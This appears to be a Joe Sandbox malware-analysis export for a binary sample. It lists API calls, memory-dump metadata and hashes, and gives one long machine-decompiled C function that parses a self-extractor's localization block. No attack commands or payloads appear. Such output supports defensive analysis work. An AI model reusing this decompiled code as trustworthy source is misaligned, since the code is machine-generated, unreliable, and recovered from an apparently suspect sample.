                                                    0x00cdce7d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc7a2
                                                    0x00cdc7a2
                                                    0x00cdc7a7
                                                    0x00cdc7a8
                                                    0x00cdc7a9
                                                    0x00cdc7ae
                                                    0x00cdc7b4
                                                    0x00cdc7b7
                                                    0x00000000
                                                    0x00cdc7b9
                                                    0x00cdc7b9
                                                    0x00000000
                                                    0x00cdc7b9
                                                    0x00cdd3d9
                                                    0x00cdd3d9
                                                    0x00cdd3de
                                                    0x00cdd3e2
                                                    0x00cdd3e6
                                                    0x00cdd3ed
                                                    0x00cdd3f4
                                                    0x00cdd3f7
                                                    0x00cdd3fc
                                                    0x00cdd3ff
                                                    0x00cdd402
                                                    0x00cdd40c

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CDC744
                                                      • Part of subcall function 00CDB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CDB3FB
                                                    • _wcslen.LIBCMT ref: 00CDCA0A
                                                    • _wcslen.LIBCMT ref: 00CDCA13
                                                    • SetWindowTextW.USER32(?,?), ref: 00CDCA71
                                                    • _wcslen.LIBCMT ref: 00CDCAB3
                                                    • _wcsrchr.LIBVCRUNTIME ref: 00CDCBFB
                                                    • GetDlgItem.USER32(?,00000066), ref: 00CDCC36
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00CDCC46
                                                    • SendMessageW.USER32(00000000,00000143,00000000,00D0A472), ref: 00CDCC54
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CDCC7F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                    • API String ID: 2804936435-312220925
                                                    • Opcode ID: 719413e01eb0c77c492401711633d3eadc5eaf56f63f26057fb41f9571ad63e8
                                                    • Instruction ID: ad2e6d5ee8039148ba8fc4a5a06468c1bedcf734e20bb20036a211b9adc8f1be
                                                    • Opcode Fuzzy Hash: 719413e01eb0c77c492401711633d3eadc5eaf56f63f26057fb41f9571ad63e8
                                                    • Instruction Fuzzy Hash: 68E160B2900259AADB25DBA4DD85EEE73BCAB04310F0040A7F719E7250EF749F85DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 85%
                                                    			E00CCDA67(char* __ecx, signed int __edx) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				void* __ebp;
                                                    				char* _t245;
                                                    				void* _t246;
                                                    				WCHAR* _t247;
                                                    				void* _t252;
                                                    				unsigned int _t258;
                                                    				signed int _t264;
                                                    				signed int _t268;
                                                    				void* _t279;
                                                    				signed short* _t283;
                                                    				void* _t284;
                                                    				void* _t290;
                                                    				signed short* _t294;
                                                    				void* _t295;
                                                    				signed int _t299;
                                                    				signed int _t303;
                                                    				signed int _t318;
                                                    				signed int _t322;
                                                    				signed int _t324;
                                                    				signed int _t326;
                                                    				signed int _t333;
                                                    				char* _t334;
                                                    				signed int _t338;
                                                    				short _t341;
                                                    				void* _t342;
                                                    				signed int _t346;
                                                    				char* _t348;
                                                    				char* _t350;
                                                    				char* _t355;
                                                    				void* _t358;
                                                    				void* _t360;
                                                    				void* _t363;
                                                    				signed int _t372;
                                                    				char* _t374;
                                                    				unsigned int _t385;
                                                    				unsigned int _t389;
                                                    				signed int _t392;
                                                    				signed int _t397;
                                                    				signed int _t399;
                                                    				void* _t400;
                                                    				signed int _t401;
                                                    				void* _t404;
                                                    				signed int _t406;
                                                    				signed int _t407;
                                                    				signed int _t410;
                                                    				signed int _t411;
                                                    				signed int _t412;
                                                    				char* _t421;
                                                    				signed int _t424;
                                                    				signed int _t425;
                                                    				void* _t430;
                                                    				char* _t434;
                                                    				signed int _t443;
                                                    				signed int _t444;
                                                    				signed int _t447;
                                                    				signed int _t448;
                                                    				signed int _t449;
                                                    				signed int _t450;
                                                    				char* _t451;
                                                    				signed int _t453;
                                                    				signed int _t455;
                                                    				void* _t456;
                                                    				intOrPtr* _t459;
                                                    				signed int _t461;
                                                    				signed int _t462;
                                                    				char* _t463;
                                                    				signed int _t466;
                                                    				signed int _t467;
                                                    				char** _t468;
                                                    				void* _t470;
                                                    				void* _t471;
                                                    				void* _t473;
                                                    				void* _t477;
                                                    				void* _t478;
                                                    
                                                    				_t443 = __edx;
                                                    				_t471 = _t470 - 0x54;
                                                    				E00CDEB78(0xcf29bd, _t468);
                                                    				E00CDEC50(0x41fc);
                                                    				_t245 = 0x5c;
                                                    				_push(_t245);
                                                    				_push(_t468[0x18]);
                                                    				_t459 = __ecx;
                                                    				_t468[4] = _t245;
                                                    				_t468[0xe] = __ecx;
                                                    				_t246 = E00CE22C6(__ecx);
                                                    				_t372 = 0;
                                                    				_t475 = _t246;
                                                    				_t247 = _t468 - 0x31d0;
                                                    				if(_t246 != 0) {
                                                    					E00CD0602(_t247, _t468[0x18], 0x800);
                                                    				} else {
                                                    					GetModuleFileNameW(0, _t247, 0x800);
                                                    					 *((short*)(E00CCC29A(_t475, _t468 - 0x31d0))) = 0;
                                                    					E00CD05DA(_t475, _t468 - 0x31d0, _t468[0x18], 0x800);
                                                    				}
                                                    				E00CC9556(_t468 - 0x4208);
                                                    				_push(4);
                                                    				 *(_t468 - 4) = _t372;
                                                    				_push(_t468 - 0x31d0);
                                                    				if(E00CC98E0(_t468 - 0x4208, _t459) == 0) {
                                                    					L125:
                                                    					_t252 = E00CC959A(_t468 - 0x4208); // executed
                                                    					 *[fs:0x0] =  *((intOrPtr*)(_t468 - 0xc));
                                                    					__eflags =  &(_t468[0x16]);
                                                    					return _t252;
                                                    				} else {
                                                    					_t447 = _t372;
                                                    					_t477 =  *0xcfe720 - _t447; // 0x64
                                                    					if(_t477 <= 0) {
                                                    						L7:
                                                    						E00CE6310(_t372,  *_t459,  *((intOrPtr*)(_t459 + 4)), 4, E00CCD6E0);
                                                    						E00CE6310(_t372,  *((intOrPtr*)(_t459 + 0x14)),  *((intOrPtr*)(_t459 + 0x18)), 4, E00CCD640);
                                                    						_t473 = _t471 + 0x20;
                                                    						_t468[0x14] = _t372;
                                                    						_t448 = _t447 | 0xffffffff;
                                                    						_t468[0xf] = _t372;
                                                    						while(_t448 == 0xffffffff) {
                                                    							_t348 = E00CC9E80(_t468 - 0x4208); // executed
                                                    							_t468[0x12] = _t348;
                                                    							_t350 = E00CC9BD0(_t468 - 0x4208, _t443, _t468 - 0x21d0, 0x2000);
                                                    							_t468[0x11] = _t350;
                                                    							_t467 = _t372;
                                                    							_t24 = _t350 - 0x10; // -16
                                                    							_t434 = _t24;
                                                    							_t468[0xa] = _t434;
                                                    							if(_t434 < 0) {
                                                    								L25:
                                                    								_t351 = _t468[0x12];
                                                    								L26:
                                                    								E00CC9D70(_t468 - 0x4208, _t468,  &(_t351[ &(_t468[0x11][0xfffffffffffffff0])]), _t372, _t372);
                                                    								_t355 =  &(_t468[0xf][1]);
                                                    								_t468[0xf] = _t355;
                                                    								__eflags = _t355 - 0x100;
                                                    								if(_t355 < 0x100) {
                                                    									continue;
                                                    								}
                                                    								__eflags = _t448 - 0xffffffff;
                                                    								if(_t448 == 0xffffffff) {
                                                    									goto L125;
                                                    								}
                                                    								break;
                                                    							} else {
                                                    								goto L10;
                                                    							}
                                                    							L12:
                                                    							_t363 = E00CE6740(_t468 - 0x21ce + _t467, "*messages***", 0xb);
                                                    							_t473 = _t473 + 0xc;
                                                    							if(_t363 == 0) {
                                                    								L24:
                                                    								_t351 = _t468[0x12];
                                                    								_t448 =  &(_t468[0x12][_t467]);
                                                    								goto L26;
                                                    							} else {
                                                    								_t350 = _t468[0x11];
                                                    							}
                                                    							L14:
                                                    							_t443 = 0x2a;
                                                    							if( *((intOrPtr*)(_t468 + _t467 - 0x21d0)) != _t443) {
                                                    								L18:
                                                    								if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x52 ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x61) {
                                                    									L21:
                                                    									_t467 = _t467 + 1;
                                                    									if(_t467 > _t468[0xa]) {
                                                    										goto L25;
                                                    									} else {
                                                    										_t350 = _t468[0x11];
                                                    										L10:
                                                    										if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x2a ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x2a) {
                                                    											goto L14;
                                                    										} else {
                                                    											goto L12;
                                                    										}
                                                    									}
                                                    								} else {
                                                    									_t358 = E00CE6740(_t468 - 0x21ce + _t467, 0xcf39c8, 4);
                                                    									_t473 = _t473 + 0xc;
                                                    									if(_t358 == 0) {
                                                    										goto L125;
                                                    									}
                                                    									goto L21;
                                                    								}
                                                    							}
                                                    							_t439 = _t468 - 0x21cc + _t467;
                                                    							if( *((intOrPtr*)(_t468 - 0x21cc + _t467 - 2)) == _t443 && _t467 <=  &(_t350[0xffffffffffffffe0])) {
                                                    								_t360 = E00CE6088(_t439, L"*messages***", 0xb);
                                                    								_t473 = _t473 + 0xc;
                                                    								if(_t360 == 0) {
                                                    									_t468[0x14] = 1;
                                                    									goto L24;
                                                    								}
                                                    							}
                                                    							goto L18;
                                                    						}
                                                    						asm("cdq");
                                                    						E00CC9D70(_t468 - 0x4208, _t468, _t448, _t443, _t372);
                                                    						_push(0x200002);
                                                    						_t461 = E00CE3E33(_t468 - 0x4208);
                                                    						_t468[0x13] = _t461;
                                                    						__eflags = _t461;
                                                    						if(_t461 == 0) {
                                                    							goto L125;
                                                    						}
                                                    						_t258 = E00CC9BD0(_t468 - 0x4208, _t443, _t461, 0x200000);
                                                    						__eflags = _t468[0x14];
                                                    						_t385 = _t258;
                                                    						_t468[0x12] = _t385;
                                                    						if(_t468[0x14] == 0) {
                                                    							_push(2 + _t385 * 2);
                                                    							_t449 = E00CE3E33(_t385);
                                                    							__eflags = _t449;
                                                    							if(_t449 == 0) {
                                                    								goto L125;
                                                    							}
                                                    							_t468[0x12][_t461] = _t372;
                                                    							E00CD1B84(_t461, _t449,  &(_t468[0x12][1]));
                                                    							L00CE3E2E(_t461);
                                                    							_t389 = _t468[0x12];
                                                    							_t461 = _t449;
                                                    							_t468[0x13] = _t461;
                                                    							L33:
                                                    							_t264 = 0x100000;
                                                    							__eflags = _t389 - 0x100000;
                                                    							if(_t389 <= 0x100000) {
                                                    								_t264 = _t389;
                                                    							}
                                                    							 *((short*)(_t461 + _t264 * 2)) = 0;
                                                    							E00CD05A7(_t468 - 0x108, 0xcf39d0, 0x64);
                                                    							_push(0x20002);
                                                    							_t450 = E00CE3E33(0);
                                                    							_t468[0x11] = _t450;
                                                    							__eflags = _t450;
                                                    							if(_t450 != 0) {
                                                    								__eflags = _t468[0x12];
                                                    								_t462 = _t372;
                                                    								_t392 = _t372;
                                                    								_t468[0xc] = _t462;
                                                    								_t268 = _t372;
                                                    								 *(_t468 - 0x40) = _t372;
                                                    								_t468[0xb] = _t392;
                                                    								_t468[0x15] = _t268;
                                                    								_t468[0xa] = 0x20;
                                                    								_t468[0xf] = 9;
                                                    								if(_t468[0x12] <= 0) {
                                                    									L109:
                                                    									__eflags =  *(_t468 - 0x40);
                                                    									if( *(_t468 - 0x40) == 0) {
                                                    										_t463 = _t468[0xe];
                                                    										L122:
                                                    										L00CE3E2E(_t468[0x13]);
                                                    										L00CE3E2E(_t468[0x11]);
                                                    										_t451 =  &(_t463[0x3c]);
                                                    										__eflags = _t463[0x2c] - _t372;
                                                    										if(_t463[0x2c] <= _t372) {
                                                    											L124:
                                                    											 *0xd010b8 = _t463[0x28];
                                                    											E00CE6310(_t372,  *_t451, _t463[0x40], 4, E00CCD7A0);
                                                    											E00CE6310(_t372, _t463[0x50], _t463[0x54], 4, E00CCD7D0);
                                                    											goto L125;
                                                    										} else {
                                                    											goto L123;
                                                    										}
                                                    										do {
                                                    											L123:
                                                    											E00CCE261(_t451, _t443, _t372);
                                                    											E00CCE261( &(_t463[0x50]), _t443, _t372);
                                                    											_t372 = _t372 + 1;
                                                    											__eflags = _t372 - _t463[0x2c];
                                                    										} while (_t372 < _t463[0x2c]);
                                                    										goto L124;
                                                    									}
                                                    									_t468[7] = _t392;
                                                    									_t468[8] = E00CE8CCE(_t372, _t462, _t468 - 0x40);
                                                    									_pop(_t397);
                                                    									__eflags = _t462;
                                                    									if(_t462 == 0) {
                                                    										L118:
                                                    										 *(_t450 + _t462 * 2) = 0;
                                                    										_t279 = 0x22;
                                                    										__eflags =  *_t450 - _t279;
                                                    										if( *_t450 == _t279) {
                                                    											__eflags = _t450;
                                                    										}
                                                    										_t468[9] = E00CE7625(_t372, _t450);
                                                    										asm("movsd");
                                                    										asm("movsd");
                                                    										asm("movsd");
                                                    										_t463 = _t468[0xe];
                                                    										E00CCE27C( &(_t463[0x28]), _t443, _t397, _t397, _t450);
                                                    										goto L122;
                                                    									}
                                                    									_t212 = _t462 - 1; // -1
                                                    									_t283 = _t450 + _t212 * 2;
                                                    									_t443 = 0x20;
                                                    									do {
                                                    										_t397 =  *_t283 & 0x0000ffff;
                                                    										__eflags = _t397 - _t443;
                                                    										if(_t397 == _t443) {
                                                    											goto L114;
                                                    										}
                                                    										__eflags = _t397 - _t468[0xf];
                                                    										if(_t397 != _t468[0xf]) {
                                                    											break;
                                                    										}
                                                    										L114:
                                                    										_t397 = 0;
                                                    										 *_t283 = 0;
                                                    										_t283 = _t283 - 2;
                                                    										_t462 = _t462 - 1;
                                                    										__eflags = _t462;
                                                    									} while (_t462 != 0);
                                                    									__eflags = _t462;
                                                    									if(_t462 != 0) {
                                                    										_t284 = 0x22;
                                                    										__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t284;
                                                    										if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t284) {
                                                    											__eflags = 0;
                                                    											 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
                                                    										}
                                                    									}
                                                    									goto L118;
                                                    								}
                                                    								_t468[6] = 0xd;
                                                    								_t468[5] = 0xa;
                                                    								do {
                                                    									_t399 = _t468[0x13];
                                                    									__eflags = _t268;
                                                    									if(_t268 == 0) {
                                                    										L75:
                                                    										_t443 =  *(_t399 + _t268 * 2) & 0x0000ffff;
                                                    										_t268 = _t268 + 1;
                                                    										_t468[0x15] = _t268;
                                                    										__eflags = _t443;
                                                    										if(_t443 == 0) {
                                                    											break;
                                                    										}
                                                    										__eflags = _t443 - _t468[4];
                                                    										if(_t443 != _t468[4]) {
                                                    											_t400 = 0xd;
                                                    											__eflags = _t443 - _t400;
                                                    											if(_t443 == _t400) {
                                                    												L93:
                                                    												__eflags =  *(_t468 - 0x40);
                                                    												if( *(_t468 - 0x40) == 0) {
                                                    													L105:
                                                    													 *(_t468 - 0x40) = _t372;
                                                    													_t462 = _t372;
                                                    													_t468[0xb] = _t372;
                                                    													L106:
                                                    													_t468[0xc] = _t462;
                                                    													goto L107;
                                                    												}
                                                    												_t468[7] = _t468[0xb];
                                                    												_t468[8] = E00CE8CCE(_t372, _t462, _t468 - 0x40);
                                                    												_pop(_t401);
                                                    												__eflags = _t462;
                                                    												if(_t462 == 0) {
                                                    													L102:
                                                    													 *(_t450 + _t462 * 2) = 0;
                                                    													_t290 = 0x22;
                                                    													__eflags =  *_t450 - _t290;
                                                    													if( *_t450 == _t290) {
                                                    														__eflags = _t450;
                                                    													}
                                                    													_t468[9] = E00CE7625(_t372, _t450);
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													asm("movsd");
                                                    													E00CCE27C( &(_t468[0xe][0x28]), _t443, _t401, _t401, _t450);
                                                    													_t450 = _t468[0x11];
                                                    													_t268 = _t468[0x15];
                                                    													goto L105;
                                                    												}
                                                    												_t185 = _t462 - 1; // -1
                                                    												_t294 = _t450 + _t185 * 2;
                                                    												_t443 = 0x20;
                                                    												do {
                                                    													_t401 =  *_t294 & 0x0000ffff;
                                                    													__eflags = _t401 - _t443;
                                                    													if(_t401 == _t443) {
                                                    														goto L98;
                                                    													}
                                                    													__eflags = _t401 - _t468[0xf];
                                                    													if(_t401 != _t468[0xf]) {
                                                    														break;
                                                    													}
                                                    													L98:
                                                    													_t401 = 0;
                                                    													 *_t294 = 0;
                                                    													_t294 = _t294 - 2;
                                                    													_t462 = _t462 - 1;
                                                    													__eflags = _t462;
                                                    												} while (_t462 != 0);
                                                    												__eflags = _t462;
                                                    												if(_t462 != 0) {
                                                    													_t295 = 0x22;
                                                    													__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t295;
                                                    													if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t295) {
                                                    														__eflags = 0;
                                                    														 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
                                                    													}
                                                    												}
                                                    												goto L102;
                                                    											}
                                                    											_t404 = 0xa;
                                                    											__eflags = _t443 - _t404;
                                                    											if(_t443 == _t404) {
                                                    												goto L93;
                                                    											}
                                                    											__eflags = _t462 - 0x10000;
                                                    											if(_t462 >= 0x10000) {
                                                    												goto L107;
                                                    											}
                                                    											L92:
                                                    											 *(_t450 + _t462 * 2) = _t443;
                                                    											_t462 = _t462 + 1;
                                                    											goto L106;
                                                    										}
                                                    										__eflags = _t462 - 0x10000;
                                                    										if(_t462 >= 0x10000) {
                                                    											goto L107;
                                                    										}
                                                    										_t406 = ( *(_t399 + _t268 * 2) & 0x0000ffff) - 0x22;
                                                    										__eflags = _t406;
                                                    										if(_t406 == 0) {
                                                    											_push(0x22);
                                                    											L88:
                                                    											_pop(_t407);
                                                    											 *(_t450 + _t462 * 2) = _t407;
                                                    											_t268 = _t268 + 1;
                                                    											_t468[0x15] = _t268;
                                                    											_t462 = _t462 + 1;
                                                    											goto L106;
                                                    										}
                                                    										_t410 = _t406 - 0x3a;
                                                    										__eflags = _t410;
                                                    										if(_t410 == 0) {
                                                    											_push(0x5c);
                                                    											goto L88;
                                                    										}
                                                    										_t411 = _t410 - 0x12;
                                                    										__eflags = _t411;
                                                    										if(_t411 == 0) {
                                                    											_push(0xa);
                                                    											goto L88;
                                                    										}
                                                    										_t412 = _t411 - 4;
                                                    										__eflags = _t412;
                                                    										if(_t412 == 0) {
                                                    											_push(0xd);
                                                    											goto L88;
                                                    										}
                                                    										__eflags = _t412 != 0;
                                                    										if(_t412 != 0) {
                                                    											goto L92;
                                                    										}
                                                    										_push(9);
                                                    										goto L88;
                                                    									}
                                                    									_t444 =  *(_t399 + _t268 * 2 - 2) & 0x0000ffff;
                                                    									__eflags = _t444 - _t468[6];
                                                    									if(_t444 == _t468[6]) {
                                                    										L42:
                                                    										_t443 = 0x3a;
                                                    										__eflags =  *(_t399 + _t268 * 2) - _t443;
                                                    										if( *(_t399 + _t268 * 2) != _t443) {
                                                    											L65:
                                                    											_t468[0x10] = _t399 + _t268 * 2;
                                                    											_t299 = E00CD045B( *(_t399 + _t268 * 2) & 0x0000ffff);
                                                    											__eflags = _t299;
                                                    											if(_t299 == 0) {
                                                    												L74:
                                                    												_t399 = _t468[0x13];
                                                    												_t268 = _t468[0x15];
                                                    												goto L75;
                                                    											}
                                                    											E00CD0602(_t468 - 0x298, _t468[0x10], 0x64);
                                                    											_t303 = E00CE6105(_t468 - 0x298, L" \t,");
                                                    											_t468[0x10] = _t303;
                                                    											__eflags = _t303;
                                                    											if(_t303 == 0) {
                                                    												goto L74;
                                                    											}
                                                    											 *_t303 = 0;
                                                    											E00CD1DA7(_t468 - 0x298, _t468 - 0x16c, 0x64);
                                                    											E00CD05A7(_t468 - 0xa4, _t468 - 0x108, 0x64);
                                                    											E00CD0580(__eflags, _t468 - 0xa4, _t468 - 0x16c, 0x64);
                                                    											E00CD05A7(_t468 - 0x40, _t468 - 0xa4, 0x32);
                                                    											_t318 = E00CE6159(_t372, 0, _t443, _t462, _t468 - 0xa4,  *(_t468[0xe]), _t468[0xe][4], 4, E00CCD780);
                                                    											_t473 = _t473 + 0x14;
                                                    											__eflags = _t318;
                                                    											if(_t318 != 0) {
                                                    												_t322 =  *_t318 * 0xc;
                                                    												__eflags = _t322;
                                                    												_t156 = _t322 + 0xcfe270; // 0x28b64ee0
                                                    												_t468[0xb] =  *_t156;
                                                    											}
                                                    											_t268 =  &(( &(_t468[0x15][1]))[_t468[0x10] - _t468 - 0x298 >> 1]);
                                                    											__eflags = _t268;
                                                    											_t421 = _t468[0x13];
                                                    											while(1) {
                                                    												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
                                                    												__eflags = _t443 - _t468[0xa];
                                                    												if(_t443 == _t468[0xa]) {
                                                    													goto L72;
                                                    												}
                                                    												L71:
                                                    												__eflags = _t443 - _t468[0xf];
                                                    												if(_t443 != _t468[0xf]) {
                                                    													_t468[0x15] = _t268;
                                                    													goto L107;
                                                    												}
                                                    												L72:
                                                    												_t268 = _t268 + 1;
                                                    												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
                                                    												__eflags = _t443 - _t468[0xa];
                                                    												if(_t443 == _t468[0xa]) {
                                                    													goto L72;
                                                    												}
                                                    												goto L71;
                                                    											}
                                                    										}
                                                    										_t453 = _t468[0x15];
                                                    										_t324 = _t268 | 0xffffffff;
                                                    										__eflags = _t324;
                                                    										_t466 = _t372;
                                                    										_t468[0xd] = _t324;
                                                    										_t374 = _t468[0x13];
                                                    										 *_t468 = L"STRINGS";
                                                    										_t468[1] = L"DIALOG";
                                                    										_t468[2] = L"MENU";
                                                    										_t468[3] = L"DIRECTION";
                                                    										do {
                                                    											_t468[0x10] = E00CE3E13(_t468[_t466]);
                                                    											_t326 = E00CE6088( &(_t374[2]) + _t453 * 2, _t468[_t466], _t325);
                                                    											_t473 = _t473 + 0x10;
                                                    											__eflags = _t326;
                                                    											if(_t326 != 0) {
                                                    												L47:
                                                    												_t424 = _t468[0xd];
                                                    												goto L48;
                                                    											}
                                                    											_t346 =  &(_t468[0x10][_t453]);
                                                    											_t430 = 0x20;
                                                    											__eflags = _t374[2 + _t346 * 2] - _t430;
                                                    											if(_t374[2 + _t346 * 2] > _t430) {
                                                    												goto L47;
                                                    											}
                                                    											_t424 = _t466;
                                                    											_t453 = _t346 + 1;
                                                    											_t468[0xd] = _t424;
                                                    											L48:
                                                    											_t466 = _t466 + 1;
                                                    											__eflags = _t466 - 4;
                                                    										} while (_t466 < 4);
                                                    										_t462 = _t468[0xc];
                                                    										_t372 = 0;
                                                    										_t468[0x15] = _t453;
                                                    										_t450 = _t468[0x11];
                                                    										__eflags = _t424;
                                                    										if(__eflags != 0) {
                                                    											_t268 = _t468[0x15];
                                                    											_t399 = _t468[0x13];
                                                    											if(__eflags <= 0) {
                                                    												goto L65;
                                                    											} else {
                                                    												goto L53;
                                                    											}
                                                    											while(1) {
                                                    												L53:
                                                    												_t443 = _t399 + _t268 * 2;
                                                    												_t455 =  *_t443 & 0x0000ffff;
                                                    												__eflags = _t455 - _t468[0xa];
                                                    												if(_t455 == _t468[0xa]) {
                                                    													goto L55;
                                                    												}
                                                    												L54:
                                                    												__eflags = _t455 - _t468[0xf];
                                                    												if(_t455 != _t468[0xf]) {
                                                    													_t468[0x15] = _t268;
                                                    													_t425 = _t372;
                                                    													_t456 = 0x20;
                                                    													__eflags = ( *_t443 & 0x0000ffff) - _t456;
                                                    													_t468[0x10] = _t372;
                                                    													_t450 = _t468[0x11];
                                                    													if(( *_t443 & 0x0000ffff) <= _t456) {
                                                    														L60:
                                                    														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = 0;
                                                    														E00CD1DA7(_t468 - 0x1d0, _t468 - 0xa4, 0x64);
                                                    														_t468[0x15] =  &(_t468[0x15][_t468[0x10]]);
                                                    														_t333 = _t468[0xd];
                                                    														__eflags = _t333 - 3;
                                                    														if(_t333 != 3) {
                                                    															__eflags = _t333 - 1;
                                                    															_t334 = "$%s:";
                                                    															if(_t333 != 1) {
                                                    																_t334 = "@%s:";
                                                    															}
                                                    															E00CCE5B1(_t468 - 0x108, 0x64, _t334, _t468 - 0xa4);
                                                    															_t473 = _t473 + 0x10;
                                                    														} else {
                                                    															_t338 = E00CE3E49(_t468 - 0x1d0, _t468 - 0x1d0, L"RTL");
                                                    															asm("sbb al, al");
                                                    															_t468[0xe][0x64] =  ~_t338 + 1;
                                                    														}
                                                    														L51:
                                                    														_t268 = _t468[0x15];
                                                    														goto L107;
                                                    													} else {
                                                    														goto L57;
                                                    													}
                                                    													while(1) {
                                                    														L57:
                                                    														__eflags = _t425 - 0x63;
                                                    														if(_t425 >= 0x63) {
                                                    															break;
                                                    														}
                                                    														_t341 =  *_t443;
                                                    														_t443 = _t443 + 2;
                                                    														 *((short*)(_t468 + _t425 * 2 - 0x1d0)) = _t341;
                                                    														_t425 = _t425 + 1;
                                                    														_t342 = 0x20;
                                                    														__eflags =  *_t443 - _t342;
                                                    														if( *_t443 > _t342) {
                                                    															continue;
                                                    														}
                                                    														break;
                                                    													}
                                                    													_t468[0x10] = _t425;
                                                    													goto L60;
                                                    												}
                                                    												L55:
                                                    												_t268 = _t268 + 1;
                                                    												L53:
                                                    												_t443 = _t399 + _t268 * 2;
                                                    												_t455 =  *_t443 & 0x0000ffff;
                                                    												__eflags = _t455 - _t468[0xa];
                                                    												if(_t455 == _t468[0xa]) {
                                                    													goto L55;
                                                    												}
                                                    												goto L54;
                                                    											}
                                                    										}
                                                    										E00CD05A7(_t468 - 0x108, 0xcf39d0, 0x64);
                                                    										goto L51;
                                                    									}
                                                    									__eflags = _t444 - _t468[5];
                                                    									if(_t444 != _t468[5]) {
                                                    										goto L75;
                                                    									}
                                                    									goto L42;
                                                    									L107:
                                                    									__eflags = _t268 - _t468[0x12];
                                                    								} while (_t268 < _t468[0x12]);
                                                    								_t392 = _t468[0xb];
                                                    								goto L109;
                                                    							} else {
                                                    								L00CE3E2E(_t461);
                                                    								goto L125;
                                                    							}
                                                    						}
                                                    						_t389 = _t385 >> 1;
                                                    						_t468[0x12] = _t389;
                                                    						goto L33;
                                                    					} else {
                                                    						goto L5;
                                                    					}
                                                    					goto L7;
                                                    					L5:
                                                    					E00CCE261(_t459, _t443, _t447);
                                                    					E00CCE261(_t459 + 0x14, _t443, _t447);
                                                    					_t447 = _t447 + 1;
                                                    					_t478 = _t447 -  *0xcfe720; // 0x64
                                                    					if(_t478 < 0) {
                                                    						goto L5;
                                                    					} else {
                                                    						_t372 = 0;
                                                    						goto L7;
                                                    					}
                                                    				}
                                                    			}
                                                    0x00cce18b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce18d
                                                    0x00cce18d
                                                    0x00cce18f
                                                    0x00cce192
                                                    0x00cce195
                                                    0x00cce195
                                                    0x00cce195
                                                    0x00cce19a
                                                    0x00cce19c
                                                    0x00cce1a0
                                                    0x00cce1a1
                                                    0x00cce1a6
                                                    0x00cce1a8
                                                    0x00cce1aa
                                                    0x00cce1aa
                                                    0x00cce1a6
                                                    0x00000000
                                                    0x00cce19c
                                                    0x00ccdd80
                                                    0x00ccdd87
                                                    0x00ccdd8e
                                                    0x00ccdd8e
                                                    0x00ccdd91
                                                    0x00ccdd93
                                                    0x00cce02a
                                                    0x00cce02a
                                                    0x00cce02e
                                                    0x00cce02f
                                                    0x00cce032
                                                    0x00cce035
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce03b
                                                    0x00cce03f
                                                    0x00cce092
                                                    0x00cce093
                                                    0x00cce096
                                                    0x00cce0b6
                                                    0x00cce0b6
                                                    0x00cce0ba
                                                    0x00cce145
                                                    0x00cce145
                                                    0x00cce148
                                                    0x00cce14a
                                                    0x00cce14d
                                                    0x00cce14d
                                                    0x00000000
                                                    0x00cce14d
                                                    0x00cce0c3
                                                    0x00cce0cf
                                                    0x00cce0d2
                                                    0x00cce0d3
                                                    0x00cce0d5
                                                    0x00cce110
                                                    0x00cce112
                                                    0x00cce118
                                                    0x00cce119
                                                    0x00cce11c
                                                    0x00cce11e
                                                    0x00cce11e
                                                    0x00cce131
                                                    0x00cce137
                                                    0x00cce138
                                                    0x00cce139
                                                    0x00cce13a
                                                    0x00cce13f
                                                    0x00cce142
                                                    0x00000000
                                                    0x00cce142
                                                    0x00cce0d7
                                                    0x00cce0dc
                                                    0x00cce0df
                                                    0x00cce0e0
                                                    0x00cce0e0
                                                    0x00cce0e3
                                                    0x00cce0e6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce0e8
                                                    0x00cce0ec
                                                    0x00000000
                                                    0x00000000
                                                    0x00cce0ee
                                                    0x00cce0ee
                                                    0x00cce0f0
                                                    0x00cce0f3
                                                    0x00cce0f6
                                                    0x00cce0f6
                                                    0x00cce0f6
                                                    0x00cce0fb
                                                    0x00cce0fd
                                                    0x00cce101
                                                    0x00cce102
                                                    0x00cce107
                                                    0x00cce109
                                                    0x00cce10b
                                                    0x00cce10b
                                                    0x00cce107
                                                    0x00000000
                                                    0x00cce0fd
